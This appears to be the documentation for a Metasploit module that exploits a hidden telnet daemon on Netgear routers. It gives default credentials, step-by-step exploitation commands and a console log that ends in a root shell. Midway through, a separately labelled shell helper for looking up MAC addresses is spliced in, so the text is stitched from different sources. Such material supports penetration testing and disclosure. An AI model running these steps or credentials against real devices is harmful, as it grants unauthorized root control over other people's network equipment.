## Intro

Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon a successful connection, a root shell should be presented to the user.

There are many devices which contain this daemon; for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console).

This module has been successfully tested against:

- AC1450 in whatever version I bought it with (TCP)
- AC1450 latest V1.0.0.36_10.0.17 (UDP)
- N300 WNR2000 v3 (TCP)

## Setup

A MAC address is required for exploitation. To determine the MAC address of the device:

1. Ping the device to force an ARP lookup: `ping -c 1 [IP]`
2. Get the MAC from the ARP cache: `arp -an [IP]`

## Targets

**0 (Automatic)**

Detect whether the device listens on TCP or UDP.

**1 (TCP)**

Older devices usually listen on TCP.

**2 (UDP)**

Newer devices usually listen on UDP.

## Options

**MAC**

Set this to the MAC address of the device. You can use `ping` and `arp` to find it.

**USERNAME**

If this is an older device, it'll take the value of `super_username` in `nvram`. `Gearguy` is usually correct. If this is a newer device, it'll take the web UI username, which is usually unchanged from `admin`.

**PASSWORD**

If this is an older device, it'll take the value of `super_passwd` in `nvram`. `Geardog` is usually correct. If this is a newer device, it'll take the web UI password, which is usually unchanged from `password`.

**VERBOSE**

This will display the username and password used in the magic packet.

## Exploitation

1. Make sure you have a vulnerable device
2. Start metasploit
3. `use exploit/linux/telnet/netgear_telnetenable`
4. `set rhost [IP]`
5. `set mac [MAC Address]`
6. `exploit`
7. Enjoy a root shell!
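The two Setup steps above, scripted as a POSIX sh helper. This is an added example, not part of the module or its documentation: it pings once to populate the ARP cache, reads the entry the way the page's `arp -an [IP]` command does, and turns the hardware address into a zero-padded, lowercase, colon-separated MAC. The parsing is split into its own function so it can be checked against sample `arp -an` output (constructed here), and it reports failure when the entry is `<incomplete>`/`(incomplete)`, which means the device never answered the ARP request. The function names are my own.

```shell
#!/bin/sh
# Resolve a LAN device's MAC address as the Setup section describes:
# ping once to force an ARP lookup, then read the ARP cache entry.

# Extract and normalise the hardware address from one line of `arp -an`
# output. Returns 1 when the line has no usable address, e.g. the entry is
# "<incomplete>" (Linux) or "(incomplete)" (macOS) because the host did not
# reply to the ARP request.
mac_from_arp_line() {
    # the hardware address is the token that follows " at "
    raw=$(printf '%s\n' "$1" | sed -n 's/.* at \([^ ]*\).*/\1/p')
    case $raw in
        ''|'<incomplete>'|'(incomplete)') return 1 ;;
    esac
    # macOS prints octets without leading zeros (0:1e:2a:...); pad each
    # octet to two hex digits and lowercase it so the result is uniform
    mac=$(printf '%s\n' "$raw" | awk -F: 'NF != 6 { exit 1 }
        { out = ""
          for (i = 1; i <= 6; i++) {
              o = tolower($i)
              if (length(o) == 1) o = "0" o
              out = out (i > 1 ? ":" : "") o
          }
          print out }') || return 1
    # reject anything that is still not six hex octets
    printf '%s\n' "$mac" | grep -Eq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' || return 1
    printf '%s\n' "$mac"
}

# Full procedure for a live host: ping (its exit status does not matter,
# one request is enough to populate the ARP cache), then query the cache
# with the same `arp -an [IP]` invocation the page uses.
resolve_mac() {
    ping -c 1 "$1" >/dev/null 2>&1 || true
    mac_from_arp_line "$(arp -an "$1" 2>/dev/null | head -n 1)"
}

# usage: ./resolve_mac.sh 192.168.1.1
if [ $# -eq 1 ]; then
    resolve_mac "$1" || { echo "no ARP entry for $1 (device did not answer)" >&2; exit 1; }
fi
```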
## Usage

```
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```

If you've already exploited TelnetEnable, the exploit will attempt to connect to `telnetd` directly. This saves us from sending the magic packet again.

```
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
```